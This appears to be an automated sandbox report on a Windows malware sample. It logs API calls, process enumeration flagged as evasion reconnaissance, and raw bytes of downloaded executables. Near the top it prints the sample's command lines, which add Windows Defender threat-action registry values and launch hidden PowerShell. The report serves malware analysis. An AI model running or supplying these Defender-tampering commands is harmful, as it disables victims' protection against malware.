CreateProcessInternalW May 31, 2024, 7:34 a.m.	thread_identifier: 3572 thread_handle: 0x00000318 process_identifier: 3504 current_directory: C:\Users\test22\AppData\Local\Temp\7zSFD51.tmp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000320	1	1
ShellExecuteExW May 31, 2024, 7:34 a.m.	show_type: 0 filepath_r: cmd parameters: /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath: cmd	1	1
CreateProcessInternalW May 31, 2024, 7:34 a.m.	thread_identifier: 3240 thread_handle: 0x0000012c process_identifier: 3280 current_directory: C:\Users\test22\AppData\Local\Temp\7zSFD51.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW May 31, 2024, 7:34 a.m.	thread_identifier: 3216 thread_handle: 0x0000011c process_identifier: 3204 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW May 31, 2024, 7:34 a.m.	thread_identifier: 1696 thread_handle: 0x0000012c process_identifier: 3388 current_directory: c:\windows\system32 filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
ShellExecuteExW May 31, 2024, 7:34 a.m.	show_type: 0 filepath_r: C:\Windows\system32\gpupdate.exe parameters: /force filepath: C:\Windows\System32\gpupdate.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (39 events)

Time & API	Arguments	Status	Return
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: pw.exe process_identifier: 804	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: taskhost.exe process_identifier: 1804	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: SearchProtocolHost.exe process_identifier: 1680	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: SearchFilterHost.exe process_identifier: 1020	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: axplont.exe process_identifier: 2388	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: mscorsvw.exe process_identifier: 2708	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: fileosn.exe process_identifier: 2892	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: Newoff.exe process_identifier: 2216	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: jsc.exe process_identifier: 1872	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: mpVxwmaUWkvooa27wKUZd6Do.exe process_identifier: 3052	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: 360TS_Setup.exe process_identifier: 3184	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: TrustedInstaller.exe process_identifier: 3428	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: 360TS_Setup.exe process_identifier: 3780	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: conhost.exe process_identifier: 2208	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: explorer.exe process_identifier: 3116	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: VjKwGjaJtKztciMR3QUC8xCl.exe process_identifier: 3108	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: Install.exe process_identifier: 3236	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: Install.exe process_identifier: 3092	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: cmd.exe process_identifier: 1516	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: conhost.exe process_identifier: 3340	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: raserver.exe process_identifier: 1556	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: pw.exe process_identifier: 3488	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: cmd.exe process_identifier: 3504	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: conhost.exe process_identifier: 3680	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: forfiles.exe process_identifier: 3540	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: cmd.exe process_identifier: 3588	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: forfiles.exe process_identifier: 2136	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: is32bit.exe process_identifier: 1656	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: cmd.exe process_identifier: 3776	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: is32bit.exe process_identifier: 3764	1	1
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: inject-x86.exe process_identifier: 3772	1	1
Process32NextW May 31, 2024, 7:35 a.m.	snapshot_handle: 0x00000714 process_name: taskhost.exe process_identifier: 3180	1	1
Process32NextW May 31, 2024, 7:35 a.m.	snapshot_handle: 0x00000714 process_name: SearchFilterHost.exe process_identifier: 3492	1	1
Process32NextW May 31, 2024, 7:35 a.m.	snapshot_handle: 0x00000714 process_name: cmd.exe process_identifier: 3664	1	1
Process32NextW May 31, 2024, 7:35 a.m.	snapshot_handle: 0x00000714 process_name: conhost.exe process_identifier: 2252	1	1
Process32NextW May 31, 2024, 7:35 a.m.	snapshot_handle: 0x00000714 process_name: pw.exe process_identifier: 3940	1	1
Process32NextW May 31, 2024, 7:35 a.m.	snapshot_handle: 0x00000714 process_name: WMIADAP.exe process_identifier: 3992	1	1
Process32NextW May 31, 2024, 7:35 a.m.	snapshot_handle: 0x00000714 process_name: dllhost.exe process_identifier: 3928	1	1
Process32NextW May 31, 2024, 7:35 a.m.	snapshot_handle: 0x00000714 process_name: raserver.exe process_identifier: 3276	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 31, 2024, 7:34 a.m.	process_identifier: 3092 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 1445888 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 31, 2024, 7:31 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes axplont.exe, newoff.exe, jsc.exe, mpvxwmauwkvooa27wkuzd6do.exe (22 events)

Time & API	Arguments	Status	Return
InternetReadFile May 31, 2024, 7:29 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $8üÉsV¯ÉsV¯ÉsV¯U®ÅsV¯S®csV¯R®ÜsV¯òR®ÛsV¯òU®ÜsV¯W®ÌsV¯ÉsW¯²sV¯òS®sV¯:ñ_®ÈsV¯:ñT®ÈsV¯RichÉsV¯PELÜRfà'VU~0@"@ø2 <@"ÈHØÍTÍ@0ô.text% `.bsS: `.rdataö0@@.data\|û@ ä$ @À.relocÈH@"J"@Bjjh8#b¹è"bè!hÕHèêtYÃVWjèY_Y¿8#bðÏè`!jVÏÇ8#b5Hèä,hßHè²tY_^Ã¹á"béf"¹à"bèâFhéHètYÃ¹@%bèÌFhóHèztYÃhHèntYÃhýHèbtYÃ¹&bèFhHèLtYÃhHè@tYÃÌÌÌÌÌÌÌD$ÃUìQQEVñEøEøÆEüVÇd3H"bRPèYYÆ^ÉÂD$Çd3HaaAÁÂVñFÇd3H `PD$ÀPè@YYÆ^ÂAÇd3HPèYÃy¸DÌHEAÃVñFÇd3HPèjöD$Yt jVèíiYYÆ^ÂaaD$AÁÇp3HÂVñFÇd3HPè&öD$Yt jVè©iYYÆ^ÂAÇd3HPèÿYÃaÁaÇAXÌHÇ\|3HÃVñFÇd3HPèÓöD$Yt jVèViYYÆ^ÂAÇd3HPè¬YÃ¸ÿÿÿÃUììMôèÿÿÿh2IEôPè¤ÌVÿt$ñè·þÿÿÇ\|3HÆ^ÂVÿt$ñèþÿÿÇp3HÆ^ÂéµhD$L$#Pü+ÂÀüøwÃéZÂÂÂÁÂÂhpÌHèÜ?ÌD$VñxvPèìýÿÿÇ3HÆ^ÂVñFÇd3HPèá~öD$Yt jVèdhYYÆ^ÂAÇd3HPèº~YÃVÿt$ñèèýÿÿÇ3HÆ^ÂD$I;HÀÂÂD$D$AÁÂÃAÃAÿ1Èÿt$ÿRD$ÂD$D$AÁÂÃAÃT$Vt$BN@;Au ;u°^Ã2À^ÃD$T$HÂUìQQÿuUøÿuRÿPPè±ÿÿÿYYÉÂAVt$V;Bu;D$u°ë2À^ÂD$L$Ç@ìbÃUìì$¡@@I3ÅEø}$VuWt¿ÌHWè TYPWMèMUàÿuRÿP}ôEàÿuðGEàMPèhMàè:EÎPè Mè'MøÆ_3Í^èfÉÃUìì ¡@@I3ÅEøEVìñÌPèMÿuEàÿuPèNÿÿÿÄ$ÎPèêýÿÿMàèÔMÆUNMøÇ3H3ÍV^è,fÉÂVñFÇd3HPèÁ\|öD$Yt jVèDfYYÆ^ÂAÇd3HPè\|YÃUìäøì¡@@I3ÄD$EVñL$PèPD$ÎPÿuÿuè)ÿÿÿL$è7L$ÆÇ 3H^3Ìèeå]ÂVñFÇd3HPè-\|öD$Yt jVè°eYYÆ^ÂAÇd3HPè\|YÃVÿt$ñèÇ 3HÆ^ÂVt$WVùèûÿÿÇ3HFVGÇW_^Â¸ÌHÃUì}uMjhøÌHè´ëÿuè =YMPèoE]ÂöD$Vñt jVè eYYÆ^ÂÂ¸ìbÃUìäøQEVÿuñÿpÿ0è·þÿÿÇ4HÆ^å]ÂUìEìàAIV#ÈtD}uCöÁt¾ÌHëöÁ¾¨ÌH¸ÀÌHDðEøjPè/ýÿÿYYPVMäèÿÿÿhP2IEäPë ^ÉÂjjèóÌAÃyÀÃAÃA Q$ÃQ$A Vt$W\|$y$_q ^ÂVñFÇd3HPèzöD$Yt jVèdYYÆ^ÂAÇd3HPèkzYÃVÿt$ñèqþÿÿÇ4HÆ^Ây~PÃyÀÃVñW3ÿ9~t,è¢>9Fujë Wÿvÿ6è>ÄÀtjë >~_^ÃjèàÌQèÇÃA+ÁøÃé\|éT3ÀAAÁÃVñ&fèÆ^ÃQèÃA+ÁøÃééÆéV3ÀAAÁÃyÀÃyv ÁÃVÿt$ñèðOYPÿt$Îèo^ÂD$ÐxvÿpRèTÂé&VWÿt$ñ3Àþ««««ffè¹_Æ^ÂVWÿt$ñ3Àþ««««ffèOYPÿt$Îè_Æ^ÂVWÿt$ñ3Àÿt$þ««««ffèb_Æ^ÂVWñ3Àþ««««D$ÈffxvÿpQÎè_Æ^ÂÂÂVñ>tF+àøPÿ6è3ÀYFYF^ÃÁÃÁÃVñ&fè¢Æ^ÂVñ>tF+àüPÿ6èV3ÀYFYF^ÃÁÃÁÃVñFøv@Pÿ6è.YYfÇFÆ^ÃUìS]WùGO+Á;Øw*GÇvVSÿu4Vè#ÄÆÇ^ëSÿuÆEÏÿuSè'_[]ÂUìVuW}WÿuVèþuVÿuWèóÄÆ7_^]ÂVt$jVQè}fÄÇFÆ^ÂÂyv ÁÃyv ÁÃD$Ãé¤MD$L$;BÁÃÁÃD$ÁàPÿt$è(YYÂÁÃVñèD^ÃÁÃD$ÁàPÿt$èYYÂÁÃÁÃÂD$@Pÿt$èãYYÃÂÂyÀÃD$D$Ãÿt$ÿt$ÿt$è¼vD$ÄÃÿt$ÿt$ÿt$è#\|D$ÄÃÁÃÁÃÿt$ÿt$èYYÂD$Ã¸ìbÃS[Ãj$¸uçGèIcÇEèè"b3öÆEìhØÌHèLYÈMä¡è"b@¸#b#b;Þ\|;þv;Þ\|;ùv+ùÞëWÀ request_handle: 0x00cc000c	1	1
InternetReadFile May 31, 2024, 7:29 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL:½à0ìÐ¶¹ @ @d¹O ÄÉH¹ H.texté ì `.rsrcÄÉ Ìð@@.reloc¼@B¹HT-üMPø0 1s, ~Ï%-&~Îþls- %Ï(+o/ 8Ðo0 ±%rprYp~1 (2 ¢%rqpr¯p~1 (2 ¢%rÇprp~1 (2 ¢%r!prap~1 (2 ¢( o3 81(4 s_sm~1 }Í~1 s5 (6 o7 }Í{ÍrqprÑp~1 (2 o8 ,rãprp~1 (2 +;rprap~1 (2 o8 -{Í(+{Í((9 þ 9:o: (; o< o= (> {Í((9 þ 9ñs? s? s? þ`s@ ~Ð%-&~ÎþmsA %Ð(+þas@ ~Ñ%-&~ÎþnsA %Ñ(+þbs@ ~Ò%-&~ÎþosA %Ò(+oB þ9E{Í±%rip¢oC r}p(> (C(+oE sF (N(+oToG #>@(H (I ioJ &ÞÞ(K þ9þcs@ ~Ó%-&~ÎþpsA %Ó(+þds@ ~Ô%-&~ÎþqsA %Ô(+þes@ ~Õ%-&~ÎþrsA %Õ(+ÞÞo_oaþfsL ~Ö%-&~ÎþssM %Ö(+ocoiþgsN ~×%-&~ÎþtsO %×(+oeþhsP ~Ø%-&~ÎþusQ %Ø(+ogþisR ~Ù%-&~ÎþvsS %Ù(+ok( +,dsm%o_%r£p(> oa%sU oc%oi%ok%sV oe%sW ogoX ( +,dsm%o_%rµp(> oa%sU oc%oi%ok%sV oe%sW ogoX ÞÞolþ,oX (Y :ÃúÿÿÞþoZ Üo[ :%úÿÿÞ,oZ ÜÞ&Þ + Añ,:ÕåäÉµDù4â$0sr rËp(\ (] þ , Ýî(srÝpo&8oo^ oo^ (rùpo8 ,4sr ³%-o_ oo oq +sr%oo%oq ÞÞXoþ:NÿÿÿÞ ÞÞÞ+ALPà1Ó 0sU ³%Ð°(` sa (\ (] þ , ÝS(s³%Ð\|(` sa o&8òsoo^ ooo^ oo(oÞÞÞoo(K - o+rýpoo(K - o+rýpoo(K - o+rýpoÜorýp(b ,oc Xoþ :úþÿÿÞÞÞÞ+*AdzJÄzRÌoC8{}0Ìs? (\ (] þ , Ý£(s³%Ð(` sa o&8Css%oo^ ov%oo^ o: .þox%oo^ oz%oo: 1þo\|%oo^ (d @Bj[!¶Yo~%oo^ o%r po(oo}jþ,-(e (f (g request_handle: 0x00cc000c	1	1
InternetReadFile May 31, 2024, 7:29 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ûÆÔ¿§ºM¿§ºM¿§ºMlÕ¹L³§ºMlÕ¿L§ºMlÕ¾Lª§ºM}&¾L§ºM}&¹L«§ºMlÕ»Lº§ºM¿§»Mã§ºM}&¿Lð§ºML%¿L¾§ºML%¸L¾§ºMRich¿§ºMPEL$Jfà'"«°@P@TP<01X0@°H.textù `.rdataº§°¨@@.datadÅ`¶B@À.reloc0 ø@B¹(HèXhm¥BèTYÃh¥BèHYÃhw¥Bè<YÃjjh0H¹Hèyhh¥BèYÃVWjèáLY¿0HðÏèÂhjVÏÇ0HXÃBèwmh¥BèåY_^Ã¡HÇhHHH¡lHÄHÃ¹(HèÛWh¥Bè¯YÃjjhPH¹Hèzh©¥BèYÃVWjèTLY¿PHðÏè5hjVÏÇPHXÃBèêlh³¥BèXY_^Ã¹ùHé#z¹øHèbWh½¥Bè6YÃ¹©Hé}¹¨HèBWhÇ¥BèYÃjjhH¹°Hè_\|hÑ¥Bè÷YÃVWjè»KY¿HðÏè£\|ÏÇHÄBÆHHÆ>HèÃl¡XH \H%8HhÛ¥B5LH£@H DHèY_^Ã¹Hè¥Vhï¥BèyYÃhå¥BèmYÃÌÌÌD$Vñj,fèÿt$FÀPÿ6èFÄL$FHFHFÆ@FÆ@ Æ^Âj ¸B¡Bè$]3ÿÇEèÿuèÐ=YÈMä@t D$;Ç\|;÷v;Ç\|;ñv+ñÇëWÀfEÜEàuÜEìSMÔè¾$}Øu j^Öé}üAD%Àø@t<Eì;Ç\|3;÷v-H¶D@PL8èQøÿtsÆÿuÜEìÐÿEìEàëÉAL8WÿuäÿuÿP$;EäuE;×uAEì;Ç\|3;÷v-H¶D@PL8è´PøÿtÆÿuÜEìÐÿEìEàëÉj^×ëj^ÖUè@\| \|$Müÿë;MPÑBj^Æj3É9J8EñðVÊè8¸½@ÃMüÿ3ÿj^]UèHËW3À9y8EðqòVèW8MÔè)%ÃèÃÌÌÌÌÌD$ÈxvÿpQÿt$èÄÃÿt$L$èóL4ÃD$=rPèYÃÀtPè]YÃ3ÀÃD$H#;Èô5QèCYÈÉt A#ààHüÃéÇÞj,è&Y@@fÇ@Ãj,¸_¡Bèçñuì3Û]è@L08ÉtÿPSÎè /À]üxþ]àÆEä]åG0HMÔÿPVMØèýEÐPèLYÿuMèQWÿuäÿuàÿuÜÿuØMÈQÈÿR(MÐèÜ#Müÿë5MìpñFjZÂj3É9N8EÑÐRÎèï6¸U@ÃMüÿ3ÛuìHÎSjX3Ò9Y8EÂAEèPèÁ6@L08ÉtÿPÆè`ÂÌÌÌÌÌS\$Ué¹ÿÿÿ;ÙwZjX;ØwSÿt$]UEèá6ÄÆ+ë4VWQPSè{(ðNQèFþÿÿSÿt$(ø]W}uè6ÄÆ_^][Âè 5ÌS\$Ué¹þÿÿ;ÙwdjX;ØwSÿt$]UEè6Ä3ÀfD]ë;VWQPSè8(ðÄNQÍè5Sÿt$ø]W}uèM6Ä3Àf__^][Âè¥4ÌSÙ¹ÿÿÿW\|$;ùwQjX;øwjÿt${SCèlÄë.VQPWè'ðNQè^ýÿÿOQÿt$${PsèÅ5Ä^_[Âè=4ÌS\$ºÿÿÿUé;Úw`¾D$jYD$;ÙwSPU]Mè¤ÄÆ+ë4VWRQSè!'ðNQèìüÿÿSÿt$(ø]W}uèK¤ÄÆ_^][ÂèÆ3ÌVt$W\|$+\|$Wÿt$VèÄ7_^ÃUìE=rEPEPèv&EYYPÿuè"YY]ÃUììSVWÿuEôÙPè¹ÿuð}èË¥¥¥uðVèA ÀtE0Æ@ë?{]tÑt=ÿuMøÿ3SèöùÿÿMøp`è VÿuìËÿuèè£MÁÆA_^[ÉÂèL2Ìj¸\|¡Bè7ñuà}+>ÁÿF+Áø=ÿÿÿ?@EèPèB&EìPÎèÏ2Ø]äeü<»M F9EuÓëVSÿuQèÒÄMFWVRPQè½ÄMüÿÿuìÿuèSÎè&ÇèÂÿuìÿuäMàèï3jjè¤è=2ÌÌÌÌÌÌVñÿpÿt$èj,ÿ6è¹YY^ÂVt$WùëÿvÏÿt$èèÿÿÿVÿt$6èYY~ tÞ_^ÂVt$ÿt$FPVè=Ä+Æ^ÃVt$ÿt$FPVè#Ä+Æ^ÃT$Hb By u%D$V03À 9q}IëJ@ By tã^ÂÂUì}0uj ë}E\|ÀuEu9EÀ]ÃjX]ÃìT¡H3ÄD$PD$XS\$pUl$lL$L$xD$$\$L$VWÉt<+t<-u3ÿGë3ÿEº0#Â;Âtº¶Bë"Gº¶B;Áw<;0uL;ùxtùXuøRSèq5D$0j.XfD$è;6D$D$PSèM5ØÄE0HL$ÿPD$Pè YL$ðè2jÿt$L$8è.\|$DD$0L$$GD$0PD$ÁPQÎÿRE0HL$ÿPD$Pè"YL$ðèÜL$HQÎÿPÎÿPD$$D$;ØtÎÿP\|$DÈD$0GD$0D$¼$tG;Øt$HD\$(\|$\Gt$HëÀ~,¾ÈÃ+Ç;Ès!ÿt$$+ÙL$4jSèËFF8Oð<uÐ}$D$@D$\|} vu ;ðv+ðë3öE\$ %Àø@¨=tOVÿt$\|D$ ÿt$xÿt$ request_handle: 0x00cc000c	1	1
InternetReadFile May 31, 2024, 7:29 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $>Þ£Õ_°ðÕ_°ðÕ_°ð-³ñÙ_°ð-µñy_°ð-´ñÀ_°ðÞ´ñÇ_°ðÞ³ñÀ_°ð-±ñÐ_°ðÕ_±ð©_°ðÞµñ_°ð&ÝµñÔ_°ð&Ý²ñÔ_°ðRichÕ_°ðPELSfà'Ì2°@ @¨<@8I~8(}@¨.textÕ}~ `.bsSN `.rdataO°P@@.data° òì@À.idatadÞ@@.00cfg0ð@@.relocW@Xò@BÌÌÌÌÌé©é(®éLDéé"éðéCé#éUéWéZ¥éãï éÅó é¯Xéýé{õé½Äé [é¦Eé·Þ éUS é{ÿéúéj¿éúépéÚsé>ÎéFé2æé«é/éýºéQ¡éÜ9égSééýéDé^Äé3Øéôééãé!ééìÙé ¿éé;¸éUJ é%Géh+éÝé§éfWéð´écénÁ éÁé¦ÜéêîéúIé: é@(éÍéû0é«Béïy é©XéÇéÎÞéé¦éÔûéüésé ÉéÐAé¢üéãHé±ké{Òél=é-ré#é5é.réßâé§éWé°éÈéÅ¦é0éÝ¹é®3éáÈéY]é§véc é8céÇéìÅ éÂééNéTéäéjJé9léÛ¸ékAéU^ éáBéÌ5é¬né=ézÉé(éÇOé=ëé¡ÔéTjé¤úéç éÇÁéðXéõkéN4 éï5 éNËéuéé¾Óé©GéGé6éÍé{éîQé×é-q é:éð!ééé é¿Ìé¥éQ`éæéøKé£AéÊàé6 é'ZéôRé³êé,ÄéKÈé/Eém:éÕÎéå`éäáé jéîéé ÀéÎGéK é-aéO é¿ é@éAqéÈééõ±émé éÈ]é×Õé¨génìéÎ6é±é½¾éN ézKéÜÈé é]éVþéÑAééx éåQé¡téªüécé.^é éã$é 1éÍénéà'é)léð© éÎéFÄé¼ éé]\é éóùéBpéµé±ÙéÖ.éHèé`ééüLéÍ`é7DéBTé³^é ég]étEéÍ7éé éTeé¿{éeÞéïé« éËDé" éåÐéB éÅé#éÂéûÁéç éAVéàéUé_éméJ2é<«éû,é¨téGåéìì éíSé0ÄéòéTõéûé=ÃéMé$%é\|ü é=þ éÒìé@iééyé$ùék<éèéÜéÎ×éø2é1éb¦éiPé)é_éª#é¶&éé×ééAé¿+éÃ· é!ÂéÚ«é'Zé2Pé"´é;ué çéôéRé5éPaéGFéfSéjé\|éÅ0 é»çéiä éîjéUüék/ é)=éøDé4ÞéËæétÝéòeé«Çé¾éÚ écé éCíé5éfééQé+éáéÇé¶]é>Âé¯©én÷éÿé\éáÐé÷`é é,{éÈYéîÆéÙÇéØÎé4%é¾iéêqéÑBéÃé½Wé^KéáHé§éì½écéã²é¶ëéUNéÉMéMÖ éeÜé/'é38éü'é³éÛéfçéÁxéq+ éöMéYé°Àéé)éâ é¡éråéz é é+jééèSéï÷ éIÂéIêéô5é<é1é é`étgé©îéÄðéI6é7]é%1é0¾ éþ«é¶Æéqoé]Ðé7Déâég éÆéÀ·éë'é³¢é§éé?é 9étéFAéàÔéíë é:Ëé Íéf6 éÎéÝ{éBéS<é, éjéçÆéÕfé3óé%)é@ë éeTé¶Íé¤5é±>éqé©éXécðén=é«éºéYóé&éÛ3éý0é¢1é épéÚç éìéÙ³éAZémmé éë é_ éipéÁbéaÏéªÃé¾éÊéæ¸ éüC é}öéü{éw=é¢ïé× é¼é{ö é&NénDéÄ=éeé§éxXéF½é]$év;éïÏéã2 é ééÎgéµésér é¯é]é¶ÜéºJéJÆéÄ±éfØéOé¡é¼ éwé:?éZ}éÂép6é¾éb¸ é éßé"Ïé·¾éÆ é÷Ö éÖéEÐéªé'ùéøÎé¦ érV éääéOéVé½ºé~ëéÔ´éËFéüWé¢Æ é8¢éh2éBóéäÈéBLé6é6Æ éîÍéÕÂérM éÃMéüñéégé¡&éFéÑé\|.é°8éNté~Óékãéè éÅé.&é/ éeHéVÔé>Oééã;éëTé2JéKÇéÓf é%¡é²/ép5 éPôéëÀé1¥éYQ é*éÔè éÉÒéåé¨ é.PééTé¼Réa0éýéûß éöHéï=énÚéHéü¦é0é7ç é%éÖ ééã£ éÐ é=íéê½é_émæ éãé³4é9Tén`é5éLcé½éõéâé:ªéé éºé'éTÿééY request_handle: 0x00cc000c	1	1
InternetReadFile May 31, 2024, 7:29 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¹nÊöý¤¥ý¤¥ý¤¥.}§¤ñ¤¥.}¡¤Q¤¥.} ¤è¤¥? ¤ï¤¥?§¤è¤¥.}¥¤ú¤¥ý¥¥¤¥?¡¤«¤¥¤ü¤¥¦¤ü¤¥Richý¤¥PEL¾%Ffà'4òÜP@P@X P ,K0ïTpî@P.text34 `.rdatahP8@@.dataäp vN @À.reloc,KLÄ@B¹ÐåKè:hBHèFYÃjjhðæK¹ æKè¡FhBHè'YÃVWjè2¢Y¿ðæKðÏèåFjVÏÇðæKÔZHèbMh BHèïY_^Ã¹æKéG¹æKè:hªBHèÍYÃh¾BHèÁYÃh´BHèµYÃjjhçK¹ðçKè5`hÈBHèYÃVWjè¡¡Y¿çKðÏèTFjVÏÇçKÔZHèÑLhÒBHè^Y_^Ã¡ðçKÇàêKðçKH¡äêK,èKÃ¹çKèf9hÜBHè(YÃ¹QèKéPc¹PèKèF9hæBHèYÃjjh¨èK¹XèKèbhðBHèéYÃVWjèô Y¿¨èKðÏè[bÏÇ¨èK\HÆðèKÆæèKèg¡éK éK%àèKhúBH5ôèK£èèK ìèKèY_^Ã¹ëKè©8hCHèkYÃhCHè_YÃÌÌÌD$ÃUìQQEVñEøEøÆEüVÇ¤SH"bRPèå YYÆ^ÉÂD$Ç¤SHaaAÁÂVñFÇ¤SH `PD$ÀPè¡ YYÆ^ÂAÇ¤SHPèí YÃy¸íHEAÃVñFÇ¤SHPèË öD$Yt jVèDYYÆ^ÂaaD$AÁÇ°SHÂVñFÇ¤SHPè öD$Yt jVèYYÆ^ÂAÇ¤SHPè` YÃaÁaÇAíHÇ¼SHÃVñFÇ¤SHPè4 öD$Yt jVèYYÆ^ÂAÇ¤SHPè YÃ¸ÿÿÿÃUììMôèÿÿÿhWIEôPèY«ÌVÿt$ñè·þÿÿÇ¼SHÆ^ÂVÿt$ñèþÿÿÇ°SHÆ^ÂéD$L$#Pü+ÂÀüøwÃéUÂÂÂÂÁÂÂh0íHè@ÌD$VñxvPèéýÿÿÇÈSHÆ^ÂVñFÇ¤SHPè?öD$Yt 